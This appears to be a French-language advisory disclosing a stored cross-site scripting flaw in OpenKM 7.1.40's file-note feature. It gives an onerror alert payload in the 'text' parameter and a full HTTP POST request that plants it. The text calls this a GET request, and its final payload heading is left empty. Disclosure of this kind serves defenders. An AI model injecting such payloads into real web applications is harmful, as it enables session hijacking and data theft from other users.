
Une vulnérabilité de script intersite stocké (XSS) existe dans OpenKM version 7.1.40.
Une vulnérabilité de cross-site scripting (XSS) stocké existe dans OpenKM version 7.1.40 (dbb6e88) avec l’extension Professional, permettant à un utilisateur authentifié de téléverser une note sur un fichier, qui agit comme une charge utile XSS stocké. Tout utilisateur qui ouvre la note d’un fichier document déclenchera le XSS.
Paramètre vulnérable : text
Payload :
FINAL Payload (URL encoded) : <image/src/onerror%3dalert(1)>
Requête GET sur [http://localhost/openkm/rest/note/nodes/NODE-ID] :
POST /openkm/rest/note/nodes/34bc430a-e3db-4efa-8289-3d0894010f67 HTTP/2
Host: EXAMPLE.COM
Cookie: lang=en-GB; JSESSIONID=EC6EF7B1DB85C3A839C9D3054095AA8E
Content-Length: 23
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
X-Requested-App: kcenter
Sec-Ch-Ua-Mobile: ?0
Authorization: OKM ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, */*
Sec-Ch-Ua-Platform: "Windows"
Origin: https://EXAMPLE.COM
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://EXAMPLE.COM/openkm
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
text=<image/src/onerror%3dalert(1)>
Le XSS stocké permet aux attaquants d’injecter des scripts malveillants dans une application web ; ceux-ci sont stockés et exécutés lorsque d’autres utilisateurs consultent la page affectée. Cela peut conduire au vol d’informations sensibles, au détournement de session ou à la distribution de logiciels malveillants.

Payload :
FINAL Payload (URL encoded) :